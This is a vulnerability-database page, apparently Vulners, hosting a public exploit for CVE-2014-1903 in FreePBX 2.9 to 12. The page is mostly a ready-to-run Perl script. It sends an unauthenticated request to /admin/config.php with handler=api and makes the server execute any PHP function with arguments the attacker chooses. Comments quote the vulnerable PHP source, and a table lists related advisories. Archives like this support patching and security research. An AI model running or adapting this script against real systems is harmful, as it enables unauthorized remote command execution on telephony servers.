Lucene search
K

FreePBX 2.11.0 - Remote Command Execution

🗓️ 12 Mar 2014 00:00:00Reported by @0x00stringType 
exploitpack
 exploitpack
👁 31 Views

FreePBX 2.11.0 Remote Command Execution via AP

Related
Code
ReporterTitlePublishedViews
Family
0day.today
FreePBX config.php Remote Code Execution Vulnerability
25 Mar 201400:00
zdt
Circl
CVE-2014-1903
12 Mar 201400:00
circl
Check Point Advisories
FreePBX config php Code Execution (CVE-2014-1903)
18 May 201400:00
checkpoint_advisories
CVE
CVE-2014-1903
18 Feb 201411:00
cve
Cvelist
CVE-2014-1903
18 Feb 201411:00
cvelist
Exploit DB
FreePBX 2.11.0 - Remote Command Execution
12 Mar 201400:00
exploitdb
Exploit DB
FreePBX - 'config.php' Remote Code Execution (Metasploit)
25 Mar 201400:00
exploitdb
Metasploit
FreePBX config.php Remote Code Execution
21 Mar 201403:29
metasploit
NVD
CVE-2014-1903
18 Feb 201411:55
nvd
OpenVAS
FreePBX 2.9 - 12 RCE Vulnerability - Active Check
14 Mar 201400:00
openvas
Rows per page
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;

# Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution
# Google Dork: n/a
# Date: 2/25/14
# Exploit Author: @0x00string
# Vendor Homepage: http://www.freepbx.org/
# Software Link: http://mirror.freepbx.org/freepbx-2.11.0.tar.gz
# Version: 2.11 tested working
# Tested on: Ubuntu 12.04, 13.10
# CVE : CVE-2014-1903


#	References:
#	http://seclists.org/bugtraq/2014/Feb/42
#	http://issues.freepbx.org/browse/FREEPBX-7123
#	http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1903
#
#	Developer Advisory:
#	http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice



# in /admin/config.php
#	// handle special requests
#	if (!isset($no_auth) && isset($_REQUEST['handler'])) {
#		$module = isset($_REQUEST['module'])	? $_REQUEST['module']	: '';
#		$file 	= isset($_REQUEST['file'])		? $_REQUEST['file']		: '';
#		fileRequestHandler($_REQUEST['handler'], $module, $file);
#		exit();
#	}


# in /admin/library/view.functions.php
#	    case 'api':
#	      if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) {
#	        $function = $_REQUEST['function'];
#	        $args = isset($_REQUEST['args'])?$_REQUEST['args']:'';
#	
#	        //currently works for one arg functions, eventually need to clean this up to except more args
#	        $result = $function($args);
#	        $jr = json_encode($result);
#	      } else {
#	        $jr = json_encode(null);
#	      }
#	      header("Content-type: application/json");
#	      echo $jr;
#	    break;


$| = 1;

my $sock = new IO::Socket::INET (
    PeerHost => $ARGV[0],
    PeerPort => '80',
    Proto => 'tcp',
);
die "$!\n" unless $sock;
my $func = $ARGV[1];
my $args = "";
my $i = 0;
my $max = 1;
foreach(@ARGV) {
	if ($i > 1) {
		$args .= $_;
	}
	unless($i > (scalar(@ARGV) - 2)) {
		$args .= "%20";
	}
	$i++;
}
my $payload = "display=A&handler=api&file=A&module=A&function=" . $func . "&args=" . $args;
chomp($payload);
print "payload is " . $payload . "\n";
my $packet = 	"GET http://" . $ARGV[0] . "/admin/config.php?" . $payload . "\r\n\r\n";
my $size = $sock->send($packet);
shutdown($sock, 1);
my $resp;
$sock->recv($resp, 1024);
print $resp . "\n";
$sock->close();
exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Mar 2014 00:00Current
6.7Medium risk
Vulners AI Score6.7
EPSS0.52186
31